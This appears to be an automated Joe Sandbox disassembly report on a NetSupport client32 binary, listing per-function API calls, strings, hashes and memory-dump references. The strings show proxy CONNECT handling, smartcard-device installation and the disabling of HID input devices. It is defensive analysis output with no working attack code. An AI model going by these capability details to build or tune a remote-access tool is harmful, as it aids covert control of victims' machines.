Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6e757ecc0f0d063ec7eb2b0048c626c058edb454fc3b1665e22f246af9f0d88
Instruction ID: b5cb5aeab8dca114fa565c2528a60170732ab8958f56686238177c64a5fd148f
Opcode Fuzzy Hash: f6e757ecc0f0d063ec7eb2b0048c626c058edb454fc3b1665e22f246af9f0d88
Instruction Fuzzy Hash: 1BC10C309086E55BD719CF7D88A046DFFF1DE96201748C6AEE4E68B682C278D614DBF0

Function 1112D2C0 Relevance: 56.4, APIs: 27, Strings: 5, Instructions: 377windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?,?,?,00000000), ref: 1112D2EF
GetClientRect.USER32(?,?), ref: 1112D31F
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 1112D33A
SelectObject.GDI32(00000000,00000000), ref: 1112D34E
SelectObject.GDI32(00000000,?), ref: 1112D35B
GetTextColor.GDI32(00000000), ref: 1112D376
GetBkMode.GDI32(00000000), ref: 1112D383
SetBkMode.GDI32(00000000,00000001), ref: 1112D392
SetRect.USER32(?,00000005,00000005,?,?), ref: 1112D3E3
SetTextColor.GDI32(00000000,00FFFFFF), ref: 1112D3EF
DrawTextA.USER32(00000000,?,?,?,00000020), ref: 1112D45A

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

%d %s, xrefs: 1112D66A
m_hWnd, xrefs: 1112D307
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 1112D302
e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h, xrefs: 1112D408, 1112D436, 1112D64D
IsA(), xrefs: 1112D40D, 1112D43B, 1112D652

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$ColorModeObjectRectSelect$BeginBitmapClientCompatibleCreateDrawErrorExitLastMessagePaintProcesswsprintf
String ID: %d %s$IsA()$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 3020923283-29264745
Opcode ID: d59ffdd2591979c44c829f97319ea5c8735ab796786ff22a7aabfc1422cc5b0b
Instruction ID: e4a614af463f3ba32ae6b948dbfb1b6a5cc0be9bddc6f11eb1a9c30d18065d07
Opcode Fuzzy Hash: d59ffdd2591979c44c829f97319ea5c8735ab796786ff22a7aabfc1422cc5b0b
Instruction Fuzzy Hash: F1E17CB5A00256AFDB15CF64CD84FEEF7B5BF48304F508199E519A7644EB30AA84CFA0

Function 11015190 Relevance: 54.4, APIs: 29, Strings: 2, Instructions: 174COMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 110151BF
GetWindowRect.USER32(00000000,?), ref: 110151EC
_memset.LIBCMT ref: 110151FA
CreateFontIndirectA.GDI32(?), ref: 11015216
SelectObject.GDI32(00000000,00000000), ref: 1101522A
SetBkMode.GDI32(00000000,00000001), ref: 11015235
BeginPath.GDI32(00000000), ref: 11015242
TextOutA.GDI32(00000000,00000000,00000000), ref: 11015260
EndPath.GDI32(00000000), ref: 11015267
PathToRegion.GDI32(00000000), ref: 1101526E
CreateSolidBrush.GDI32(?), ref: 11015280
CreateSolidBrush.GDI32(?), ref: 11015296
CreatePen.GDI32(00000000,00000002,?), ref: 110152B0
SelectObject.GDI32(00000000,00000000), ref: 110152BE
SelectObject.GDI32(00000000,?), ref: 110152CE
GetRgnBox.GDI32(00000000,?), ref: 110152DB
OffsetRgn.GDI32(00000000,?,00000000), ref: 110152FA
FillRgn.GDI32(00000000,00000000,?), ref: 11015309

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

FrameRgn.GDI32(00000000,00000000,?,00000002,00000002), ref: 1101531C
DeleteObject.GDI32(00000000), ref: 11015329
SelectObject.GDI32(00000000,?), ref: 11015333
SelectObject.GDI32(00000000,?), ref: 1101533D
DeleteObject.GDI32(?), ref: 11015346
DeleteObject.GDI32(?), ref: 1101534F
DeleteObject.GDI32(?), ref: 11015358
SelectObject.GDI32(00000000,?), ref: 11015362
DeleteObject.GDI32(?), ref: 1101536B
SetBkMode.GDI32(00000000,?), ref: 11015375
EndPaint.USER32(?,?), ref: 11015389

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110151D2
m_hWnd, xrefs: 110151D7

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$Delete$Create$Path$BeginBrushModePaintSolid$ErrorExitFillFontFrameIndirectLastMessageOffsetProcessRectRegionTextWindow_memsetwsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 494162906-1557312927
Opcode ID: 06ae283321112b545d0f64b3b06f8fd0a25e3972faa2f6290334117dc8ba537b
Instruction ID: 0dae53ec8a8f700d59e9fcd6d9c10e05b93e955bbe6dfdf0a8bc5eab80720995
Opcode Fuzzy Hash: 06ae283321112b545d0f64b3b06f8fd0a25e3972faa2f6290334117dc8ba537b
Instruction Fuzzy Hash: 77511BB6A00228AFDB11DBA4CC88FAEF7B9BF89304F108599F515D7244DB749A44CF61

Function 11119230 Relevance: 51.0, APIs: 18, Strings: 11, Instructions: 202libraryprocessloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,2F623E72,75A73760,?,75A77A80), ref: 11119277
GetCurrentProcess.KERNEL32 ref: 111192FA
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1111930E
SetLastError.KERNEL32(00000078), ref: 11119328
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111934E
_memset.LIBCMT ref: 111193AC
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 111193F1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119408
GetExitCodeProcess.KERNEL32(?,?), ref: 11119422
CloseHandle.KERNEL32(?), ref: 11119446
CloseHandle.KERNEL32(?), ref: 1111944F
FreeLibrary.KERNEL32(?), ref: 1111949C

Strings

\winst64.exe" /q /q /si, xrefs: 1111936D
IsWow64Process, xrefs: 11119300
", xrefs: 11119347
D, xrefs: 111193DD
nspscr.inf, xrefs: 111194DD
CSmartcardDeviceMngr - failed to load pscrinst.dll (%d), xrefs: 11119523
PscrInstallDeviceW, xrefs: 111194CF
CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d), xrefs: 11119503
Kernel32.dll, xrefs: 11119260
Root\NS-PseudoSmartCardReader, xrefs: 111194D8
pscrinst.dll, xrefs: 111194BE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
API String ID: 3751713381-2378866903
Opcode ID: 1c1322a16d27d7fc49c8e8f33464c3f22e0f6ef2ff991863d38a7f21db42ab11
Instruction ID: d56570f91637704808b564973e54e4635ab13e3ba2239a0607908c76791a74b6
Opcode Fuzzy Hash: 1c1322a16d27d7fc49c8e8f33464c3f22e0f6ef2ff991863d38a7f21db42ab11
Instruction Fuzzy Hash: 35817DB5D412699FCB20DFA5DDC8A9DFBB9FB48304F1441EAE419A3244DB305A80CF51

Function 11029000 Relevance: 47.5, APIs: 8, Strings: 19, Instructions: 259libraryloaderwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

LoadLibraryA.KERNEL32(-00000001,00000000,Bridge,Protocol,00000000,00000000,00000002,00000000), ref: 11029067
GetLastError.KERNEL32 ref: 1102907B
GetProcAddress.KERNEL32(00000000,br_open), ref: 110290B5
GetProcAddress.KERNEL32(00000000,br_close), ref: 110290DA
GetProcAddress.KERNEL32(00000000,br_status), ref: 110290FF

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

_memset.LIBCMT ref: 1102932D
LoadIconA.USER32(00000000,0000045C), ref: 1102937A
Shell_NotifyIconA.SHELL32(00000001,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029396

Strings

br_close, xrefs: 110290D4, 110290EF
LoadOnStartup, xrefs: 11029301
PasswordFile, xrefs: 11029257
Inactivity, xrefs: 1102926D
ComPort, xrefs: 1102917D
Debug, xrefs: 11029198
BaudRate, xrefs: 11029164
tcbr32.dll, xrefs: 11029041, 11029060, 1102908B
com%d %d /A%d /B%d /D%d /M%s /P%s /T%d /N%s, xrefs: 110292EA
*MSN, xrefs: 1102929E
ipbr32.dll, xrefs: 11029035
CLIENT32.CPP, xrefs: 110290C5, 110290EA, 1102910F
CAPICAPICAPI, xrefs: 11029219
Modem, xrefs: 110291CB
Bridge, xrefs: 11029024, 1102912D, 11029169, 11029182, 1102919D, 110291D0, 1102925C, 11029272, 110292A3, 11029306
br_status, xrefs: 110290F9, 11029114
Protocol, xrefs: 1102901F
br_open, xrefs: 110290AF, 110290CA
Password, xrefs: 11029128

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorIconLastLoad$ExitLibraryMessageNotifyProcessShell___wcstoi64_memsetwsprintf
String ID: *MSN$BaudRate$Bridge$CAPICAPICAPI$CLIENT32.CPP$ComPort$Debug$Inactivity$LoadOnStartup$Modem$Password$PasswordFile$Protocol$br_close$br_open$br_status$com%d %d /A%d /B%d /D%d /M%s /P%s /T%d /N%s$ipbr32.dll$tcbr32.dll
API String ID: 2737259558-2044059647
Opcode ID: 11b142ccfe591048df726263d131c869bb881a3fb8d325d09ae5b9e0eab2801d
Instruction ID: 80f35169613b91d4f5af84d87da118ffc0d981a7cb71d091b144a322eb08291e
Opcode Fuzzy Hash: 11b142ccfe591048df726263d131c869bb881a3fb8d325d09ae5b9e0eab2801d
Instruction Fuzzy Hash: BD91D375E01666AFDB11DF65CCC4FDEF7A9AB4530CF5081A5F918A7280EA70A9408F90

Function 11119540 Relevance: 47.4, APIs: 17, Strings: 10, Instructions: 190libraryprocessloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Kernel32.dll,?,00000001,2F623E72,75A73760,?,75A77A80), ref: 111195B7
GetCurrentProcess.KERNEL32 ref: 11119635
GetProcAddress.KERNEL32(?,IsWow64Process), ref: 11119649
SetLastError.KERNEL32(00000078), ref: 11119667
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111968D
_memset.LIBCMT ref: 111196EB
CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 11119730
WaitForSingleObject.KERNEL32(?,000000FF), ref: 11119747
CloseHandle.KERNEL32(?), ref: 1111975A
CloseHandle.KERNEL32(?), ref: 11119763
SetEvent.KERNEL32(?), ref: 111197C8
FreeLibrary.KERNEL32(?), ref: 111197D9

Strings

IsWow64Process, xrefs: 11119641
CSmartcardDeviceMngr - failed to load pscrinst.dll (%d), xrefs: 111197B1
", xrefs: 11119686
PscrRemoveDeviceW, xrefs: 11119774
Kernel32.dll, xrefs: 111195AC
CSmartcardDeviceMngr - PscrRemoveDeviceW failed (%d), xrefs: 11119794
D, xrefs: 1111971C
\winst64.exe" /q /q /su, xrefs: 111196AC
Root\NS-PseudoSmartCardReader, xrefs: 11119781
pscrinst.dll, xrefs: 11119767

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandleLibraryProcess$AddressCreateCurrentErrorEventFileFreeLastLoadModuleNameObjectProcSingleWait_memset
String ID: "$CSmartcardDeviceMngr - PscrRemoveDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrRemoveDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /su$pscrinst.dll
API String ID: 389065776-834071892
Opcode ID: c44578842d204993e841975f1a3fa7606336999d1f0e71b0295d9c2100f7e49a
Instruction ID: 4bb953576de971cc88626846f630ee5a2f793e05f54183a9a7552dd7088d59e1
Opcode Fuzzy Hash: c44578842d204993e841975f1a3fa7606336999d1f0e71b0295d9c2100f7e49a
Instruction Fuzzy Hash: D4716FB59016389FCB10DF64DC88A9EFBB9FF49714F1481EAE419A7244DB705A80CFA1

Function 11005340 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 214windowCOMMON

Download Yara Rule

APIs

Part of subcall function 110596B0: __itow.LIBCMT ref: 110596D5

GetObjectA.GDI32(?,0000003C,?), ref: 11005415

Part of subcall function 111028F0: _malloc.LIBCMT ref: 111028F9
Part of subcall function 111028F0: _memset.LIBCMT ref: 11102922

wsprintfA.USER32 ref: 1100546D
DeleteObject.GDI32(?), ref: 110054C2
DeleteObject.GDI32(?), ref: 110054CB
SelectObject.GDI32(?,?), ref: 110054E2
DeleteObject.GDI32(?), ref: 110054E8
DeleteDC.GDI32(?), ref: 110054EE
SelectObject.GDI32(?,?), ref: 110054FF
DeleteObject.GDI32(?), ref: 11005508
DeleteDC.GDI32(?), ref: 1100550E
DeleteObject.GDI32(?), ref: 1100551F
DeleteObject.GDI32(?), ref: 1100554A
DeleteObject.GDI32(?), ref: 11005568
DeleteObject.GDI32(?), ref: 11005571
ShowWindow.USER32(?,00000009), ref: 1100559F
PostQuitMessage.USER32(00000000), ref: 110055A7

Strings

PenWidth, xrefs: 110053BD
Annotate, xrefs: 11005368, 11005386, 110053A4, 110053C2, 110053E0, 110053FE, 11005484
PenStyle, xrefs: 1100539F
FillColour, xrefs: 110053DB
Tool, xrefs: 11005363
Font, xrefs: 1100547F
FillStyle, xrefs: 110053F9
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s, xrefs: 11005467
PenColour, xrefs: 11005381

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Delete$Select$MessagePostQuitShowWindow__itow_malloc_memsetwsprintf
String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$FillColour$FillStyle$Font$PenColour$PenStyle$PenWidth$Tool
API String ID: 2789700732-770455996
Opcode ID: 38e0a4013ba6ccfc7af47906be300ddd20f99b6f437103908d00d26152feb429
Instruction ID: 9e125dedda538187a29fc8d034e3741b0da66b6e6d06abace117032ecdb9a76e
Opcode Fuzzy Hash: 38e0a4013ba6ccfc7af47906be300ddd20f99b6f437103908d00d26152feb429
Instruction Fuzzy Hash: C0813775A00615AFD765EBA5C890EEBF7F9AF8C304F00854CE69697241DA70F901CF60

Function 6CC68CE0 Relevance: 42.3, APIs: 15, Strings: 9, Instructions: 292sleeplibraryfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 6CC68D37
inet_ntoa.WSOCK32(00000000), ref: 6CC68D43
_sprintf.LIBCMT ref: 6CC68D7D
_free.LIBCMT ref: 6CC68D83
GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 6CC68DCC
WSAGetLastError.WSOCK32 ref: 6CC68DF0
SetLastError.KERNEL32(00000078), ref: 6CC68E19
Sleep.KERNEL32(00000064,?,?,?,00000000,00000000,?,?,6CC69351,00000000,00000000,?,?,00000010,00000002,00000001), ref: 6CC68E31
GetModuleFileNameA.KERNEL32 ref: 6CC68ED5
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?,?,?,?,?,6CC69351,00000000,00000000), ref: 6CC69009

Strings

Error %d sending HTTP request, xrefs: 6CC68F6A
Error %d writing inet request, xrefs: 6CC68DF6
Proxy-Authenticate: Basic, xrefs: 6CC68E83
ConnResp247.tmp, xrefs: 6CC68F1E, 6CC68F8F, 6CC68FCD
Support\, xrefs: 6CC68EF4
InternetWriteFile, xrefs: 6CC68DC6
, xrefs: 6CC68E3A
CONNECT %s:%d HTTP/1.1Host:%s:%d%s, xrefs: 6CC68D77
Proxy-Authorization: BASIC %s, xrefs: 6CC68D31

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ErrorFileLast$AddressCreateModuleNameProcSleep_free_sprintfinet_ntoawsprintf
String ID: Proxy-Authenticate: Basic$$CONNECT %s:%d HTTP/1.1Host:%s:%d%s$ConnResp247.tmp$Error %d sending HTTP request$Error %d writing inet request$InternetWriteFile$Proxy-Authorization: BASIC %s$Support\
API String ID: 1677068198-3755747204
Opcode ID: d37d485a31d68bf7120a69ea23038df4ff7758eb150380c8aa99a36060957086
Instruction ID: 265ef80c5106a7a26e3708fe01373f44a9215751baa89405ad8950389255b7df
Opcode Fuzzy Hash: d37d485a31d68bf7120a69ea23038df4ff7758eb150380c8aa99a36060957086
Instruction Fuzzy Hash: F1B13A71A042199FDB50CF15DD94FDAB7B5EF8A315F0081EAE9489BB41EB309944CFA0

Function 110F3660 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD

Part of subcall function 110E2190: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,11059FDC,?,00000000,?,00000000,75A78400,?,?,11059FDC,80000001), ref: 110E21BB

GetTickCount.KERNEL32 ref: 110F376A
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 110F3777
CloseHandle.KERNEL32(00000000), ref: 110F3784
GetTickCount.KERNEL32 ref: 110F378A
wsprintfA.USER32 ref: 110F384D
_memset.LIBCMT ref: 110F385E

Strings

TraceFile, xrefs: 110F37CF
_debug, xrefs: 110F37B2, 110F37D4
Error creating process %s, xrefs: 110F3908
nsdevcon64.exe, xrefs: 110F37EE, 110F3907
Software\NetSupport Ltd\Client32, xrefs: 110F36EA
Client, xrefs: 110F36A0
Trace, xrefs: 110F37AD
%s HID*, xrefs: 110F38B5
DisabledHID, xrefs: 110F371F, 110F38EF, 110F38FB
Error %d opening key, xrefs: 110F370B
DisableHIDCode, xrefs: 110F369B
"%s" %s %s HID*, xrefs: 110F3847
nsdevcon.exe, xrefs: 110F37F5, 110F37FC, 110F3822
Waited %d ms for last devcon, xrefs: 110F3796
DisableHidDevices(%d), xrefs: 110F36C9
D, xrefs: 110F3890

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CloseCreateHandleObjectSingleWait__wcstoi64_memsetwsprintf
String ID: "%s" %s %s HID*$%s HID*$Client$D$DisableHIDCode$DisableHidDevices(%d)$DisabledHID$Error %d opening key$Error creating process %s$Software\NetSupport Ltd\Client32$Trace$TraceFile$Waited %d ms for last devcon$_debug$nsdevcon.exe$nsdevcon64.exe
API String ID: 137837830-2801557662
Opcode ID: 8f1e1271e4c92c9c1a3a940e13d6e68fb89fa67028e9693a208c4530507fd11a
Instruction ID: a4610a16a53c613ed1f339977d5de379750874e656157acc7c13e9f3e47f4d5f
